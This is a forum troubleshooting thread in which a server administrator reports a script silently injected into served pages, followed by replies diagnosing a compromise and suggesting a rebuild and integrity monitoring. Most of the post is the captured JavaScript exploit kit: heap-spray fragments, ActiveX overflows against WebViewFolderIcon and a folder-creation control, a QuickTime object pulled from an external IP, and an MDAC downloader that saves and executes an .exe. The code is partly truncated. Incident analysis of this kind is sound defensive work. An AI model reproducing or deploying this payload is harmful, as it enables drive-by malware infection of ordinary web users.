Redhat Enterprise Linux v3 Update 9 server running behind Foundry load balancer. The server has been updated with the latest patches from Redhat. Apache version is 2.0.46. We are also running Coldfusion MX 7 on the server and using PHP to serve dynamic content.
Problem description:
Earlier this week, our users started reporting that they were getting ActiveX prompts for Microsoft Data Access Component installation. In addition, some of them were getting hit by the RTSP bug (QuickTime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, cfm, etc.) a script tag similar to the one below is at times inserted right after the <body> tag.
The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.
I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below). If anybody wants to see the sniffer traces, please let me know and I can provide download links.
We also saw a post at Bloodhound virus - Web Hosting Forum - Web hosting discussion at SiteGround.com which shows a similar problem. Unfortunately the solution (use a grsecurity kernel) does not make any sense, and I suspect that it would only be a temporary solution.
Solutions tried:
I have checked for the filenames but they do not exist on the server.
1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
3) Have run f-prot - All clean
4) Manually compiled Apache 2.0.59 + PHP 5.2.3 - Problem persists.
I would appreciate it if anybody could provide some input on what we might be dealing with and how to resolve the problem.
Javascript code:
// Captured payload, part 1: build the download URL and encode it as a
// '%uXXXX' escape string (pairs of hex bytes, each pair byte-swapped).
// The remainder of the listing between this run and the `return memory;`
// fragment below was not included in the post.
var arg="akmukvfd";
// The URL is derived from the page's own host name, so it points back at
// whatever server served the injected page. Defender note: requests for
// this path in the web server access logs are an indicator of the injection.
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
// Hex-encode every character of MU. `i` is never declared, so it is an
// implicit global (sloppy-mode script).
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
// Pad to an even character count so the 4-hex-digit grouping below lines up.
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}
var MR = '';
// Re-group as %u escapes; within each group the two bytes are swapped
// (MH[i+2..i+4] is emitted before MH[i..i+2]).
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}
// Quoted forms of the plain URL and of its %u-encoded variant; MU2 is the
// value that apparently replaces the "OUTPUT MU2 HERE" marker in MDAC() below.
var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
mem_flag = 1;
having();
return memory;
}
// Instantiates the 'WebViewFolderIcon.WebViewFolderIcon .1' ActiveX control
// up to 128 times and calls its setSlice() method with the same four
// out-of-range constants each time. Every failure is silently discarded.
// Defender note: the ProgID string and the 0x0c0c0c0c / 0x7ffffffe
// constants are useful as content-inspection signatures for this payload.
function startWVF()
{
for (i=0;i<128;i++)
{
try{
// Note the space inside the ProgID ('... .1'); any instantiation error
// lands in the empty catch below.
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c );
}catch(e){}
}
}
// Calls CreateNewFolderFromName on the supplied object with an over-long
// name: 231 'A' characters followed by seven 0x0c bytes (238 characters in
// total). Called from startOverflow() only after the object with CLSID
// A09AE68F-B14D-43ED-B713-BA413F034904 has been created successfully.
function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';   // xh is exactly 231 characters after this loop
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}
// Driver for the three browser-side stages of the captured payload, selected by
// `num`: 0 = QuickTime object, 1 = the CLSID A09AE68F-... object via
// CreateNewFolderFromName, 2 = WebViewFolderIcon via startWVF(). Each stage
// swallows its own errors and then chains to the next one. makeSlide() and
// mem_flag are defined elsewhere in the listing (only a fragment of makeSlide,
// ending in `return memory;`, survives above).
// Defender note: the external host 66.96.218.85 and the path
// /download/167212/movie.qtl are network indicators from this sample.
function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
// Embeds a hidden 1x1 QuickTime object whose src points at an external .qtl file.
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="http://66.96.218.85/download/167212/movie.qtl">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
// makeSlide() is run at most once per page; mem_flag is the guard it sets.
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }
// `=` here is assignment, not comparison, so this condition is always true:
// the delayed call is always scheduled and the else branch is dead code.
// The string form of setTimeout is evaluated as code after 2 s.
if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);
} else if (num == 1) {
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");
// Probe call with a single NUL; a `false` return is taken to mean the control exists.
var ret=winzip.CreateNewFolderFromName(unescape("%00") );
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}
} catch(e) { }
// Same assignment-instead-of-comparison as above: always schedules stage 2.
if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);
} else if (num == 2) {
try {
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}
function GetRandString(len)
{
// Returns a pseudo-random lowercase string of `len` characters drawn from a
// 25-letter alphabet (the original alphabet omits 'j'). Uses Math.random(),
// which is not a cryptographic source. Used by MDAC() to build a file name.
var alphabet = "abcdefghiklmnopqrstuvwxyz";
var out = '';
var pos = 0;
while (pos < len) {
var pick = Math.floor(Math.random() * alphabet.length);
out += alphabet.charAt(pick);
pos++;
}
return out;
}
// Tries six call shapes of CreateObject/GetObject on the supplied element
// until one yields a non-null value; returns null if all of them fail.
// Every attempt is wrapped in eval() although the calls could be made
// directly, and every error is swallowed by an empty catch.
// Defender note: the sequence of eval('r = CLSID.CreateObject(...)') strings
// is distinctive enough to serve as a content signature.
function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
// Downloader stage of the captured payload. Walks a list of CLSIDs, creating
// an <object> element for each, and through that element tries to obtain three
// scriptable components: an XMLHTTP object (v[0]), ADODB.Stream (v[1]) and a
// shell object (v[2], WScript.Shell or Shell.Application). With all three in
// hand it downloads urlRealExe, writes it to c:\sys<4 random letters>.exe and
// executes it. XMLHttpDownload(), ADOBDStreamSave() and ShellExecute() are not
// part of this listing.
// The function's closing brace is missing: the post's listing is truncated here.
// Defender notes: the CLSID list and the host-side file name pattern
// c:\sys????.exe are indicators usable for detection; the "OUTPUT MU2 HERE"
// line is apparently a template marker that the injecting component replaces
// with the quoted URL built as MU2 earlier in the listing.
function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
// v[0] = XMLHTTP, v[1] = ADODB.Stream, v[2] = shell object (see below).
var v = new Array(null, null, null);
var i = 0;
// n = 1 marks that v[2] is Shell.Application rather than WScript.Shell;
// passed through to ShellExecute().
var n = 0;
var ret = 0;
// Not valid JavaScript as posted: a template marker standing in for the URL literal.
var urlRealExe =
OUTPUT MU2 HERE
;
// Stop at the trailing null entry, or as soon as all three components exist.
while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;
try {
a = document.createElement("object");
// Strip the surrounding braces from the CLSID literal.
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }
if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}
if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}
if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}
i++;
}
if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
// Drop location: c:\sys followed by four pseudo-random letters.
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}
Seems pretty clear that the server has been cracked. I wonder...did you check the signatures on all the security updates to the server? Someone got you.
Do you have hard passwords set on SSH and ftp? Do you have root login disabled? Who has physical access to the server?
If you are unable to find the particular code that is compromised, your best solution is to start over with a clean install of the OS. Actually, this is your best solution anyway. After doing the clean install, install and configure tripwire to keep track of changes.
Unfortunately the solution (use a grsecurity kernel) does not make any sense, and I suspect that it would only be a temporary solution.
Sounds like the right solution to me, and a permanent one too. Though if you're going to rebuild using a newer version of RHEL might as well use SELinux instead.
Maybe it could help to know the name of the virus: JS:IESlice.
It is detected under this name by Avast Antivirus. It seems to be new (the first sightings were reported on July 15 or so) and there are only a few references on the web to this trojan downloader.